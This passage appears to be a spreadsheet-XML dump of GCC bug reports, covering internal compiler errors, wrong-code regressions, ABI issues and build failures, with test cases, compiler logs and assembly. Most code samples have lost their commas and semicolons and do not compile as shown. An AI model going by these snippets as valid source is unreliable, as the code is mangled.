//The following line will not compile under gcc-3.2 when
//buffer is of type unsigned char[] but will if it is
//of type char[]. This code compiled fine prior to
//gcc-3.0.
  outfile.write(buffer2)
  outfile.close()
  return 0
}
Release:
gcc 3.2
Environment:
System: Linux hpc003 2.4.19pre1 #4 SMP Fri Mar 1 09:30:24 CST 2002 i686 unknown
Architecture: i686
host: i686-pc-linux-gnu
build: i686-pc-linux-gnu
target: i686-pc-linux-gnu
configured with: ../configure --prefix=/appl/gcc-3.2 --disable-shared --enable-threads --enable-version-specific-runtime-libs --with-included-gettext
Thread model: posix
gcc version 3.2
How-To-Repeat:
Built the attached program using gcc-3.2 gcc-3.0.2 and possible other gcc-3.x compilers.</t>
  </si>
  <si>
    <t>jsantiago</t>
  </si>
  <si>
    <t>GCC-3216</t>
  </si>
  <si>
    <t>buildir == srcdir setup fails at make install time</t>
  </si>
  <si>
    <t>This is may be similar to bootstrap/3075.  If you run
   ./configure
   make bootstrap
   make install
The 'make install' will fail in the runtime libraries directory
($srcdir/i686-pc-linux-gnu/DIRNAME in my case) when one of
the Makefiles tries to run mkinstalldirs as $src_topdir/../mkinstalldirs
and mkinstalldirs is actually at $src_topdir/../../mkinstalldirs in
this case.
The problem is that a directory like 'libjava' exists as both
$srcdir/libjava and $srcdir/i686-pc-linux-gnu/libjava when someone
configures as I have.  The latter of these two is a set of symlinks
to the real sources.  The Makefile in libjava assumes that 
mkinstalldirs can be found at $src_topdir/../mkinstalldirs -- a
valid assumption for the first location but not the second.
When someone configures with srcdir != builddir $src_topdir is
probably a full pathname and so mkinstalldirs is found in
both cases.  But when srcdir==builddir $src_topdir is .
and when make descends into i686-pc-linux-gnu/libjava 
mkinstalldirs gets set to ./../mkinstalldirs which is
incorrect.
My brain is too sleep deprived just now to provide a 
patch I wanted to get the problem in the DB in a (hopefully
clear) report in case someone more familiar with this bit of
the build system wants to look into it.
This problem pops up in the following directories:
libjava/libltdl
libjava/gcj
libjava/include
libjava
zlib
boehm-gc
I'll attach the make output from one of the failed make
installs.
Release:
gcc-3.0
Environment:
i686-pc-linux-gnu RH 7.1 host==build==target.
How-To-Repeat:
Unpack gcc-3.0.  
./configure make bootstrap make install.</t>
  </si>
  <si>
    <t>jason-gccbug</t>
  </si>
  <si>
    <t>GCC-62059</t>
  </si>
  <si>
    <t>signed integer overflow in diagnostic.c adjust_line</t>
  </si>
  <si>
    <t>Created attachment 33272
Used by test case
// gcc 4.9.1
// ../../gcc-4.9.1/gcc/diagnostic.c:274:42: runtime error: signed integer overflow: 2147483646 - -4 cannot be represented in type 'int'
// installparse.l is a one line file containing %{%} I am attaching it anyway
// offending instruction in diagnostic.c function adjust_line is
// right_margin = max_width - right_margin
// where max_width==INT_MAX and right_margin is negative (here is -4) 
# 1 installparse.l
static foo(void)
void bar(void)
{
 foo()
}
I am attaching installparse.l</t>
  </si>
  <si>
    <t>GCC-2301</t>
  </si>
  <si>
    <t>g++ syntax error ?</t>
  </si>
  <si>
    <t>Is 'compl' a reserved word ?
g++ test.cxx :
test.cxx: In function `int main (int char **)':
test.cxx:3: parse error before `'
Release:
gcc version 2.96 20000731 (Red Hat Linux 7.1 2.96-77.1)
Environment:
redhat 7.0 
kernel 2.2.16-22
update gcc to 2.96-77.1
How-To-Repeat:
int main (int argc char ** argv) {
int compl 
}</t>
  </si>
  <si>
    <t>philippe.jouguet</t>
  </si>
  <si>
    <t>GCC-40446</t>
  </si>
  <si>
    <t>[4.4/4.5 Regression] ICE in gen_lowpart_general</t>
  </si>
  <si>
    <t>#include 
#include 
#include 
int
main ()
{
  union { __m128d vec double val[2] } u
  std::complex c = std::complex(0 1)
  u.vec = _mm_load_pd ((double*)
  if (u.val[0] != 0 || u.val[1] != 1)
    abort ()
}
ICEs with -O1 and above in g++ 4.4 and above.  More reduced testcase:
struct S
{
  S (double r double i) { __real__ s = r __imag__ s = i }
  __complex__ double s
}
double __attribute__((vector_size (16)))
foo ()
{
  S c (0 1)
  return *(double __attribute__((vector_size (16))) *) 
}</t>
  </si>
  <si>
    <t>GCC-77653</t>
  </si>
  <si>
    <t>[7 Regression] wrong code at -Os and above on x86_64-linux-gnu (in both 32-bit and 64-bit modes)</t>
  </si>
  <si>
    <t>This is a regression from 6.2.x.
$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0919 (experimental) [trunk revision 240229] (GCC) 
$ 
$ gcc-6.2 -Os small.c ./a.out
$ gcc-trunk -O1 small.c ./a.out
$ 
$ gcc-trunk -Os small.c
$ ./a.out
Aborted (core dumped)
$ 
--------------------------------------
int a b c d e h i j k l
const int f 
static int g
void fn1 (int p1)
{
  k = d ? c % k : a * b
  h 
}
int main ()
{
  const int *m = 
  l 
  if (m != &amp;f)
    __builtin_abort ()
  fn1 (g)
  return 0
}</t>
  </si>
  <si>
    <t>GCC-43377</t>
  </si>
  <si>
    <t>lto decreases C++ stacktrace readability (debuginfo pubnames).</t>
  </si>
  <si>
    <t>$ make clean all
rm -f *.o *.s *.ii m
g++45 -Wall -g2 -O1  a.cpp -c
g++45 -Wall -g2 -O1  m.cpp -c
g++45 -Wall -g2 -O1  a.o m.o -o m --save-temps -fverbose-asm
$ readelf --debug-dump=pubnames ./m
(...)
    Offset      Name
    8e7         Y::foo                 &lt;==
    913         X::foo                 &lt;==
    968         X::~X
    98f         Y::~Y
    9b6         Y::~Y
    9fe         X::~X
    a3a         X::X
    a61         X::bar
(gdb) break Y::foo()
Breakpoint 1 at 0x400768: file a.cpp line 25.
(gdb) bt
#0  Y::foo (this=0x7fffffffe1c0) at a.cpp:26
    ^^^^^^ readable location with namespace/class prefix.
now the same with -flto.
$ make clean all LTOFLAGS=-flto
rm -f *.o *.s *.ii m
g++45 -Wall -g2 -O1 -flto a.cpp -c
g++45 -Wall -g2 -O1 -flto m.cpp -c
g++45 -Wall -g2 -O1 -flto a.o m.o -o m --save-temps -fverbose-asm
    Offset      Name
    87          foo                  &lt;==
    ca          foo                  &lt;==
    10d         __base_dtor
    12c         __base_dtor
    14b         __deleting_dtor
    183         __deleting_dtor
    1a2         __base_ctor
    1c1         bar
    1f5         main
(gdb) b Y::foo()
Breakpoint 1 at 0x400768: file a.cpp line 24.
(gdb) bt
#0  foo (this=0x7fffffffe1c0) at a.cpp:26
    ^^^ some cryptic foo.</t>
  </si>
  <si>
    <t>GCC-78758</t>
  </si>
  <si>
    <t>[7 Regression] Warning: '__builtin_memcpy' ... overflows the destination for string assignment</t>
  </si>
  <si>
    <t>I just saw the following warning:
% gfc-trunk -c gfcbug137.f90 -O
gfcbug137.f90:7:0:
      longname(5:) =   // adjustl (name(5:))
Warning: '__builtin_memcpy' writing 12 bytes into a region of size 11 overflows the destination [-Wstringop-overflow=]
for the simple code:
% cat gfcbug137.f90
integer function get_satid (name)
  character(len=*) intent(in) :: name
  character(len=16)            :: longname
  longname = name
  if (name(1:4) == GOES .and. name(5:5) /=  ) then
     longname(5:) =   // adjustl (name(5:))
  end if
  get_satid = satid_longname (longname)
end function get_satid
% gfc-trunk --version | head -1
GNU Fortran (GCC) 7.0.0 20161208 (experimental)
Note: optimization (-O or higher) is essential there is no warning
with -O0 or -Og.
For Fortran code the expected behavior in string assignment is that there
should be no overflow.</t>
  </si>
  <si>
    <t>GCC-3900</t>
  </si>
  <si>
    <t>STL construct causes /export/home2/plalonde/eagl/include/stl/concept_checks.h:533: Internal compiler error in `fix_lexical_addr' at function.c:5545</t>
  </si>
  <si>
    <t>STL causes an internal compiler error.  Here is my command line and result:
[plalonde@mallard src]$ /usr/local/bin/g++ -v -save-temps -I/export/home2/plalond
e/eagl/include/ps2 -I/export/home2/plalonde/eagl/include/cmn -I/usr/local/sce/ee/
include -I/export/home2/plalonde/real/linux/include -I/export/home2/plalonde/eagl
/include/stl -I. -I/export/home2/plalonde/eagl/cmn/anim/src -D__HOST_BYTE_ORDER=1
234 -D__TARGET_BYTE_ORDER=1234 -c -DPS2 -DTHEDEVELOPER=\plalonde\ -DTOOLLIB -DL
INUX -nostartfiles -nostdlib -fno-exceptions -x c++ -ffast-math -Wmissing-prototy
pes -Woverloaded-virtual -DINTERNALBUILD -DDEFAULTRMSDIR=ps2/rendermethods -DDEFA
ULT_COMPUTATION_SUBDIR=ps2/computations -DTOOLLIB -O3 -Wall -Wno-error -oobjz.lin
ux-ps2/rmyacc.o rmyacc.cpp
Reading specs from /usr/local/lib/gcc-lib/i686-pc-linux-gnu/2.95.1/specs
gcc version 2.95.1 19990816 (release)
 /usr/local/lib/gcc-lib/i686-pc-linux-gnu/2.95.1/cpp -lang-c++ -v -I/export/home2
/plalonde/eagl/include/ps2 -I/export/home2/plalonde/eagl/include/cmn -I/usr/local
/sce/ee/include -I/export/home2/plalonde/real/linux/include -I/export/home2/plalo
nde/eagl/include/stl -I. -I/export/home2/plalonde/eagl/cmn/anim/src -D__GNUC__=2 
-D__GNUG__=2 -D__GNUC_MINOR__=95 -D__cplusplus -D__ELF__ -Dunix -D__i386__ -Dlinu
x -D__ELF__ -D__unix__ -D__i386__ -D__linux__ -D__unix -D__linux -Asystem(posix) 
-D__OPTIMIZE__ -D__FAST_MATH__ -Wmissing-prototypes -Woverloaded-virtual -Wall -W
no-error -Acpu(i386) -Amachine(i386) -Di386 -D__i386 -D__i386__ -Di686 -Dpentiump
ro -D__i686 -D__i686__ -D__pentiumpro -D__pentiumpro__ -D__HOST_BYTE_ORDER=1234 -
D__TARGET_BYTE_ORDER=1234 -DPS2 -DTHEDEVELOPER=plalonde -DTOOLLIB -DLINUX -DINT
ERNALBUILD -DDEFAULTRMSDIR=ps2/rendermethods -DDEFAULT_COMPUTATION_SUBDIR=ps2/com
putations -DTOOLLIB rmyacc.cpp rmyacc.ii
GNU CPP version 2.95.1 19990816 (release) (i386 Linux/ELF)
#include ... search starts here:
#include  search starts here:
 /export/home2/plalonde/eagl/include/ps2
 /export/home2/plalonde/eagl/include/cmn
 /usr/local/sce/ee/include
 /export/home2/plalonde/real/linux/include
 /export/home2/plalonde/eagl/include/stl
 .
 /export/home2/plalonde/eagl/cmn/anim/src
 /usr/local/lib/gcc-lib/i686-pc-linux-gnu/2.95.1/../../../../include/g++-3
 /usr/local/include
 /usr/local/lib/gcc-lib/i686-pc-linux-gnu/2.95.1/../../../../i686-pc-linux-gnu/in
clude
 /usr/local/lib/gcc-lib/i686-pc-linux-gnu/2.95.1/include
 /usr/include
End of search list.
The following default directories have been omitted from the search path:
End of omitted list.
 /usr/local/lib/gcc-lib/i686-pc-linux-gnu/2.95.1/cc1plus rmyacc.ii -quiet -dumpba
se rmyacc.cc -O3 -Wmissing-prototypes -Woverloaded-virtual -Wall -Wno-error -vers
ion -fno-exceptions -ffast-math -o rmyacc.s
GNU C++ version 2.95.1 19990816 (release) (i686-pc-linux-gnu) compiled by GNU C v
ersion 2.95.1 19990816 (release).
/export/home2/plalonde/eagl/include/stl/concept_checks.h: In function `static voi
d _Assignable_concept_specificationallo
cator &gt;allocatorallocator &gt; &gt; &gt;
 &gt;::_Assignable_requirement_violation(listal
locator &gt;allocatorallocator &gt; &gt;
 &gt;)':
/export/home2/plalonde/eagl/include/stl/stl_map.h:63:   instantiated from `map&lt;ba
sic_stringallocator &gt;list&lt;basic_string&lt;charchar_t
raitsallocator &gt;allocatoralloc
ator &gt; &gt; &gt;lessallocator &gt; &gt;all
ocatorallocator &gt;allocator&lt;basic
_stringallocator &gt; &gt; &gt; &gt; &gt;'
../../../cmn/toollib/src/rendermethod.y:149:   instantiated from here
/export/home2/plalonde/eagl/include/stl/concept_checks.h:530: use of parameter fr
om containing function
/export/home2/plalonde/eagl/include/stl/concept_checks.h:389:   `class basic_stri
ngallocator &gt; __a' declared here
/export/home2/plalonde/eagl/include/stl/concept_checks.h:531: use of parameter fr
om containing function
/export/home2/plalonde/eagl/include/stl/concept_checks.h:389:   `class basic_stri
ngallocator &gt; __a' declared here
/export/home2/plalonde/eagl/include/stl/concept_checks.h:532: use of parameter fr
om containing function
/export/home2/plalonde/eagl/include/stl/concept_checks.h:389:   `class basic_stri
ngallocator &gt; __a' declared here
/export/home2/plalonde/eagl/include/stl/concept_checks.h:532: use of parameter fr
om containing function
/export/home2/plalonde/eagl/include/stl/concept_checks.h:389:   `class basic_stri
ngallocator &gt; __a' declared here
/export/home2/plalonde/eagl/include/stl/concept_checks.h:533: use of parameter fr
om containing function
/export/home2/plalonde/eagl/include/stl/concept_checks.h:389:   `class basic_stri
ngallocator &gt; __a' declared here
/export/home2/plalonde/eagl/include/stl/concept_checks.h:533: use of parameter fr
om containing function
/export/home2/plalonde/eagl/include/stl/concept_checks.h:389:   `class basic_stri
ngallocator &gt; __a' declared here
/export/home2/plalonde/eagl/include/stl/concept_checks.h:533: Internal compiler e
rror in `fix_lexical_addr' at function.c:5545
Please submit a full bug report.
See  for instructions.
Release:
gcc 2.95.1
Environment:
i686-pc-linux-gnu</t>
  </si>
  <si>
    <t>plalonde</t>
  </si>
  <si>
    <t>GCC-54524</t>
  </si>
  <si>
    <t>[4.6/4.7 Regression] Spurious add on sum of bitshifts (forward-propagate issue)</t>
  </si>
  <si>
    <t>There is an spurious addiu    a2a21   which causes the result to be incorrect.
tUint32 is unsigned long long
MIPS O32
GCC 4.6.3
 -nostdinc -funsigned-char  -fno-builtin -march=mips2 -G 0 -mno-gpopt -msoft-float -fno-merge-constants -pipe -Wall -O2 -fno-optimize-sibling-calls -fno-partial-inlining -fno-reorder-blocks -fno-strict-aliasing 
PUBLIC void function(
    tUint32                  index160
    tUint8 *                 data)
{
    tUint8        temp_data[160/8]
    tUint32       scrambled_address
    *(tUint64*)(temp_data+8)  = *(tUint64*)(data+8)
    scrambled_address = index160
    printf(%16llX.\n
           0x4000000000400000ull +
           (((tUint64)*(tUint16*)(temp_data+12)) &lt;&lt; 24) +
           ((tUint64)(scrambled_address 
}
0x364c70c  27bdffd0    addiu    spsp-48
0x364c710  afbf002c    sw       ra44(sp)
0x364c714  8ca8000c    lw       t012(a1)   t0 = pp qq rr ss
0x364c718  3c030040    lui      v10x40     v1 = 00 40 00 00
0x364c71c  3c024000    lui      v00x4000   v0 = 40 00 00 00
0x364c720  00085402    srl      t2t016    t2 = 00 00 pp qq
0x364c724  000a4e00    sll      t1t224    t1 = qq 00 00 00
0x364c728  01233821    addu     a3t1v1    a3 = qq 40 00 00
0x364c72c  000a5202    srl      t2t28     t2 = 00 00 00 pp
0x364c730  00e9482b    sltu     t1a3t1    t1 = carry?
0x364c734  01421021    addu     v0t2v0    v0 = 40 00 00 pp
0x364c738  00042600    sll      a0a024    a0 = index160 &lt;&lt; 24
0x364c73c  8ca30008    lw       v18(a1)
0x364c740  01221021    addu     v0t1v0    v0 += carry
0x364c744  00443021    addu     a2v0a0    a2 = v0 + index160 &lt;&lt; 24
0x364c748  3c04066e    lui      a00x66e    \_ String address
0x364c74c  24842084    addiu    a0a08324  /
0x364c750  24c60001    addiu    a2a21     - Spurious add
0x364c754  afa30018    sw       v124(sp)
0x364c758  0cb402e1    jal      printf      - Takes a0 = string. a1 = low word a2 = high word
0x364c75c  afa8001c    sw       t028(sp)
0x364c760  8fbf002c    lw       ra44(sp)
0x364c764  8fe00000    lw       zero0(ra)   (internal extension)
0x364c768  03e00008    jr       ra
0x364c76c  27bd0030    addiu    spsp48</t>
  </si>
  <si>
    <t>GCC-35828</t>
  </si>
  <si>
    <t>[C++0x] ICE on default template template parameter in template function</t>
  </si>
  <si>
    <t>Just got an ICE while compiling some template-heavy C++ code as shown below the error is reported in parse_debug.hh however the last change to the code the one that triggered the ICE was in parse_printer.hh (I split class printer into two classes printer and printer_impl). I'll add the preprocessed file in a separate comment/file.
&gt; uname -a
Darwin tigger.local 9.2.2 Darwin Kernel Version 9.2.2: Tue Mar  4 21:17:34 PST 2008 root:xnu-1228.4.31~1/RELEASE_I386 i386 i386 MacBookPro31 Darwin
&gt; g++-mp-4.3 -v
Using built-in specs.
Target: i386-apple-darwin9.2.0
Configured with: ../gcc-4.3.0/configure --prefix=/opt/macports-1.6.0 --enable-languages=cc++objcobj-c++javafortran --libdir=/opt/macports-1.6.0/lib/gcc43 --includedir=/opt/macports-1.6.0/include/gcc43 --infodir=/opt/macports-1.6.0/share/info --mandir=/opt/macports-1.6.0/share/man --with-local-prefix=/opt/macports-1.6.0 --with-system-zlib --disable-nls --program-suffix=-mp-4.3 --with-gxx-include-dir=/opt/macports-1.6.0/include/gcc43/c++/ --with-gmp=/opt/macports-1.6.0 --with-mpfr=/opt/macports-1.6.0
Thread model: posix
gcc version 4.3.0 (GCC) 
&gt; g++-mp-4.3 -I. -std=gnu++0x -D_REENTRANT -pipe -O3 -Wall -Wextra -Wimplicit -Wconversion -Wcast-align -Woverloaded-virtual -Wold-style-cast -Wformat=2 -Wswitch-enum -Wswitch-default -Wredundant-decls -fno-enforce-eh-specs -fno-strict-overflow -lpthread calculator.cc -o calculator
./parse_debug.hh: In function 'int main(int char**)':
./parse_debug.hh:101: internal compiler error: Bus error
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.</t>
  </si>
  <si>
    <t>GCC-26755</t>
  </si>
  <si>
    <t>[4.0 regression] may fail to generate code for base destructor defined inline with pragma interface</t>
  </si>
  <si>
    <t>[ no small test case yet forwarded from http://bugs.debian.org/356435 ]
Where a base class has a destructor defined inline g++ may generate
code for a derived class's destructor that calls an non-inline version
of the base class destructor but without generating code for the
latter.  This is normally masked by the fact that g++ 4.1 now
generates the base-class destructor (aka the non-in-charge destructor)
along with the whole-object destructor (aka the in-charge
destructor) but becomes a problem when linking with code generated by
g++ 4.0.
An example for this is bug #356245 (xbsql failing to build):
&gt; Automatic build of xbsql_0.11-5 on bigsur by sbuild/mips 1.80
...
&gt; /bin/sh ../libtool --mode=link g++  -UNO_READLINE -I/usr/local/include -g  -g -o xql  xql.o -lxbase -lreadline -lncurses ./libxbsql.la 
&gt; g++ -UNO_READLINE -I/usr/local/include -g -g -o .libs/xql xql.o  -lreadline -lncurses ./.libs/libxbsql.so /usr/lib/libxbase.so
&gt; ./.libs/libxbsql.so: undefined reference to `xbNdx::~xbNdx()'
&gt; collect2: ld returned 1 exit status
&gt; make[2]: *** [xql] Error 1
Ben Hutchings:
I was scratching my head over this one for a long time because
libxbase.so definitely does include an out-of-line copy of the
destructor (required for the vtable).  Eventually I remembered that the
destructor can be called in several different ways and that the G++ ABI
provides separate entry points each with its own symbol for those
different cases.  These aren't distinguished when demangling so we must
turn that off to see that:
libxbase built with g++ 4.0 has:
0001e940 W _ZN5xbNdxD0Ev  // deleting destructor
0001eb30 W _ZN5xbNdxD1Ev  // complete object destructor
libxbsql built with g++ 4.0 has:
00015676 W _ZN5xbNdxD1Ev  // complete object destructor
00012aec W _ZN5xbNdxD2Ev  // base object destructor
libxbase (built with g++ 4.1) has:
0001f850 W _ZN5xbNdxD0Ev  // deleting destructor
0001f8e0 W _ZN5xbNdxD1Ev  // complete object destructor
0001f960 W _ZN5xbNdxD2Ev  // base object destructor
libxbsql (built with g++ 4.1) has:
         U _ZN5xbNdxD1Ev  // complete object destructor
         U _ZN5xbNdxD2Ev  // base object destructor
It appears that g++ 4.1 generates out-of-line code for all inline
destructors along with other members of the class and relies on that
avoid generating duplicates elsewhere.  But g++ 4.1 is supposed to be
binary-compatible with g++ 4.0 and this behaviour isn't so this is a
bug in g++.
Ben.</t>
  </si>
  <si>
    <t>GCC-48576</t>
  </si>
  <si>
    <t>wrong code when accessing variables in a large stack frame</t>
  </si>
  <si>
    <t>Created attachment 23964
preprocessed source
Tried with 4.5.2 (and 4.6.0) stage1 compiler:
../gcc-4.5.2/configure \
  --target=arm-linux-gnueabi \
  --disable-shared \
  --disable-bootstrap \
  --with-sysroot=/usr/arm-linux-gnueabi \
  --disable-threads \
  --disable-libmudflap \
  --disable-libssp \
  --with-arch=armv7-a --with-tune=cortex-a8 --with-float=hard --with-fpu=neon \
  --enable-languages=c \
  --with-newlib
When compiling the attached source with:
./cc1 -O1 -fgcse -fno-omit-frame-pointer jaj.i
gcc produces this code to do arr[n] = strdup(str):
...
	bl	strdup
	sub	r3 fp #4096
	ldr	r3 [r3 #-132]  @ this kills r3
	ldr	r2 [r3 #-128]  @ and this doesn't know about it
	str	r0 [r2 r3 asl #2]
...
The problem is first visible in jaj.i.192r.ira when using -fdump-rtl-all.  Omitting frame pointer helps but I think it's pure coincidence.  Apologies about the messy test code but I was not able to reduce it more without changing the output.</t>
  </si>
  <si>
    <t>akos.pasztory</t>
  </si>
  <si>
    <t>GCC-9478</t>
  </si>
  <si>
    <t>CNI Invocation of Java code from C++ example fails</t>
  </si>
  <si>
    <t xml:space="preserve"> Works fine for me.  It's not nice but I can't think of a fix right now.
 // test.cc
 #include 
 #include 
 #include 
 #include 
 extern void _Jv_ThisExecutable(char const*)
 int main(int argc char **argv)
 {
   using namespace java::lang
   _Jv_ThisExecutable (argv[0])
   try
   {
     JvCreateJavaVM(NULL)
     JvAttachCurrentThread(NULL NULL)
     String *message = JvNewStringLatin1(Hello from C++)
     JvInitClass(
     System::out-&gt;println(message)
     JvDetachCurrentThread()
   }
   catch (Throwable *t)
   {
     System::err-&gt;println(JvNewStringLatin1(Unhandled Java exception:))
     t-&gt;printStackTrace()
   }
 }
Release:
unknown</t>
  </si>
  <si>
    <t>GCC-8453</t>
  </si>
  <si>
    <t>ABI Issue:  Destructors for already constructed objects not called when the exception is thrown inside constructor.</t>
  </si>
  <si>
    <t>Based on C++ ABI ( Section 3.3.3: Array Construction and Destruction API )
    While creating an array of objects If the constructor throws an exception call the destructor for any already-constructed elements and rethrow the exception.
    In the following example The testcase wants to create an array of 4 objects. While creating 3rd object it throws an exception. So based on C++ ABI destructors should be called for already constructed first 2 elements.
     When I compiled the testcase with gcc 3.2 compiler I am getting different output.
Contents of file : tt.cpp
-------------------------
#include 
static  int i = 0
struct C3
{
        C3() {
                if ( i == 2 )
                        throw 1
                else
                        i++
                printf(%sC%d()\n  3)
        }
        ~C3() {
                printf(%sC%d()\n ~ 3)
        }
}
C3 o3[4]
int main()
{
    return 0
}
[cmd_prompt]$ g++ tt.cpp
[cmd_prompt]$ a.out
C3()
C3()
Abort (core dumped)
-----------
Expected output:
C3()
C3()
~C3()
~C3()
Abort (core dumped)
-----------
gcc compiler version:
[cmd]$ g++ -v
Reading specs from /usr/lib/gcc-lib/i386-redhat-linux/3.2/specs
Configured with: ../configure --prefix=/usr --mandir=/usr/share/man --infodir=/usr/share/info --enable-shared --enable-threads=posix --disable-checking --host=i
386-redhat-linux --with-system-zlib --enable-__cxa_atexit
Thread model: posix
gcc version 3.2 (Red Hat Linux Rawhide 3.2-1)
Actually I tried on both IA32 and IA64 platforms.
IA32 - Redhat Linux 8.0 product
IA64 - United Linux 1.0
--------
Release:
gcc - 3.2
Environment:
Redhat 8.0 product ( ia32 )
United Linux 1.0 ( ia64 )
How-To-Repeat:
[cmd_prompt]$ g++ tt.cpp
[cmd_prompt]$ a.out
C3()
C3()
Abort (core dumped)</t>
  </si>
  <si>
    <t>sunil.k.davasam</t>
  </si>
  <si>
    <t>GCC-64787</t>
  </si>
  <si>
    <t>Invalid code on sourced allocation of class(*) character string</t>
  </si>
  <si>
    <t>On trunk
 module X
 contains
    subroutine AddCopy(C)
    class(*) intent(in) :: C
    class(*) pointer :: P
    allocate(P source=C)
    end subroutine
 end module X
 program test
 use X
 call AddCopy('test string')
 end program test
compiles but when compiled with -O3 this always gives me a Seg Fault when run (and probably invalid code more generally).
It may be related to
https://gcc.gnu.org/bugzilla/show_bug.cgi?id=64692
https://gcc.gnu.org/bugzilla/show_bug.cgi?id=44672</t>
  </si>
  <si>
    <t>GCC-25891</t>
  </si>
  <si>
    <t>gomp tests run on non-libgomp (non-thread) ports failing all</t>
  </si>
  <si>
    <t>Errors in the log look like (for mmix-knuth-mmixware):
Running /home/hp/combined/combined/gcc/testsuite/gcc.dg/gomp/gomp.exp ...
Executing on host: /home/hp/combined/mmixware-sim/gcc/xgcc -B/home/hp/combined/mmixware-sim/gcc/ /home/hp/combined/combined/gcc/t\
estsuite/gcc.dg/gomp/appendix-a/a.1.1.c   -fopenmp -fno-show-column -S  -isystem /home/hp/combined/mmixware-sim/mmix-knuth-mmixwa\
re/./newlib/targ-include -isystem /home/hp/combined/combined/newlib/libc/include  -o a.1.1.s    (timeout = 300)
xgcc: unrecognized option '-pthread'^M
There was some IRC discussion which misattributed the errors to libgomp wrongly
being built but libgomp isn't built for targets where this was noticed:
mmix-knuth-mmixware cris-axis-elf.
A simple gating test in gomp.exp testing error-free compilation of trivial code
with -fopenmp should do it.</t>
  </si>
  <si>
    <t>GCC-57961</t>
  </si>
  <si>
    <t>Excessive memory use with -O0 ?</t>
  </si>
  <si>
    <t>Created attachment 30540
C source code
I just tried to compile the attached code with -O0.  Over 4 Gig of RAM
seemed to be required to compile it with gcc trunk from 20130721 but
gcc 481 seems to compile it ok in 1 Gig.
[dcb@localhost foundBugs]$ (ulimit -v 4000000 /home/dcb/gcc/results/bin/gcc -O0 -c bug115.c)
bug115.c: In function â€˜VLparseâ€™:
bug115.c:18324:9: warning: passing argument 1 of â€˜VLerrorâ€™ discards â€˜constâ€™ qualifier from pointer target type [enabled by default]
         VLerror (yymsgp)
         ^
bug115.c:4726:13: note: expected â€˜char *â€™ but argument is of type â€˜const char *â€™
 extern void VLerror( char* msg )
             ^
virtual memory exhausted: Cannot allocate memory
[dcb@localhost foundBugs]$ /home/dcb/gcc/results/bin/gcc -v
Using built-in specs.
COLLECT_GCC=/home/dcb/gcc/results/bin/gcc
COLLECT_LTO_WRAPPER=/home/dcb/gcc/results/libexec/gcc/x86_64-unknown-linux-gnu/4.9.0/lto-wrapper
Target: x86_64-unknown-linux-gnu
Configured with: ../src/trunk/configure --prefix=/home/dcb/gcc/results --enable-checking=yes --enable-languages=cc++fortran
Thread model: posix
gcc version 4.9.0 20130721 (experimental) [trunk revision 193500] (GCC)
[dcb@localhost foundBugs]$ (ulimit -v 1000000 /usr/bin/gcc -O0 -c bug115.c)
bug115.c: In function â€˜VLparseâ€™:
bug115.c:18324:9: warning: passing argument 1 of â€˜VLerrorâ€™ discards â€˜constâ€™ qualifier from pointer target type [enabled by default]
         VLerror (yymsgp)
         ^
bug115.c:4726:13: note: expected â€˜char *â€™ but argument is of type â€˜const char *â€™
 extern void VLerror( char* msg )
             ^
[dcb@localhost foundBugs]$ /usr/bin/gcc -v
Using built-in specs.
COLLECT_GCC=/usr/bin/gcc
COLLECT_LTO_WRAPPER=/usr/libexec/gcc/x86_64-redhat-linux/4.8.1/lto-wrapper
Target: x86_64-redhat-linux
Configured with: ../configure --prefix=/usr --mandir=/usr/share/man --infodir=/usr/share/info --with-bugurl=http://bugzilla.redhat.com/bugzilla --enable-bootstrap --enable-shared --enable-threads=posix --enable-checking=release --with-system-zlib --enable-__cxa_atexit --disable-libunwind-exceptions --enable-gnu-unique-object --enable-linker-build-id --with-linker-hash-style=gnu --enable-languages=cc++objcobj-c++javafortranadagolto --enable-plugin --enable-initfini-array --enable-java-awt=gtk --disable-dssi --with-java-home=/usr/lib/jvm/java-1.5.0-gcj-1.5.0.0/jre --enable-libgcj-multifile --enable-java-maintainer-mode --with-ecj-jar=/usr/share/java/eclipse-ecj.jar --disable-libjava-multilib --with-isl=/builddir/build/BUILD/gcc-4.8.1-20130603/obj-x86_64-redhat-linux/isl-install --with-cloog=/builddir/build/BUILD/gcc-4.8.1-20130603/obj-x86_64-redhat-linux/cloog-install --with-tune=generic --with-arch_32=i686 --build=x86_64-redhat-linux
Thread model: posix
gcc version 4.8.1 20130603 (Red Hat 4.8.1-1) (GCC) 
[dcb@localhost foundBugs]$ 
Suggest code rework.</t>
  </si>
  <si>
    <t>GCC-38709</t>
  </si>
  <si>
    <t>ICE on zero-sized array in initialization expression</t>
  </si>
  <si>
    <t>$&gt; cat ice.f90
  INTEGER PARAMETER :: i = 42
  INTEGER PARAMETER :: array(1) = (/ 1 /)
  INTEGER PARAMETER :: unknown = array(shape(i))
END
$&gt; gfortran-svn ice.f90
f951: internal compiler error: in find_array_section at fortran/expr.c:1213
$&gt; gfortran-svn --version
GNU Fortran (GCC) 4.4.0 20090101
intel 10.1:
$&gt; ifort -warn all ice.f90
fortcom: Error: ice.f90 line 3: When using this inquiry function the shape of this object cannot be evaluated to a constant.   [SHAPE]
      INTEGER PARAMETER :: unknown = array(shape(i))
--------------------------------------------^
Lahey: Shape of arrays on left and right sides of assignment do not conform.</t>
  </si>
  <si>
    <t>GCC-8415</t>
  </si>
  <si>
    <t>reflection bug: exception info for Method</t>
  </si>
  <si>
    <t xml:space="preserve">	libgcj doesn't build proper reflection data for interpreted
classes.  The problem is that the format of the names of the exception
classes differs between native and interpreted code.  For native code
we get LMyException and for interpreted code we get MyException.
libgcj is written to expect LMyException.  What you end up with in
Method is a Class[] filled with null instead of a proper array of
exception classes.
Release:
3.3 20021031 (experimental)
Environment:
System: Linux build.tokyo.redhat.com 2.4.18-14smp #1 SMP Wed Sep 4 12:34:47 EDT 2002 i686 i686 i386 GNU/Linux
Architecture: i686
host: i686-pc-linux-gnu
build: i686-pc-linux-gnu
target: i686-pc-linux-gnu
configured with: ../../FSF/GCC/HEAD/gcc/configure --prefix=/home/green/latest/i --enable-threads --enable-languages=cc++java : (reconfigured)
How-To-Repeat:
	I don't have a simple test case prepared.  However all you 
need to do to trigger this is call Method.toString() on a Method
of an interpreted class which throws an exception.</t>
  </si>
  <si>
    <t>GCC-59245</t>
  </si>
  <si>
    <t>[4.9 Regression] ICE on valid code at -O3 on x86_64-linux-gnu in set_value_range at tree-vrp.c:443</t>
  </si>
  <si>
    <t>The following code causes an ICE when compiled with the current gcc trunk at -O3 on x86_64-linux-gnu (in both 32-bit and 64-bit modes). 
This is a regression from 4.8.x.
$ gcc-trunk -v
Using built-in specs.
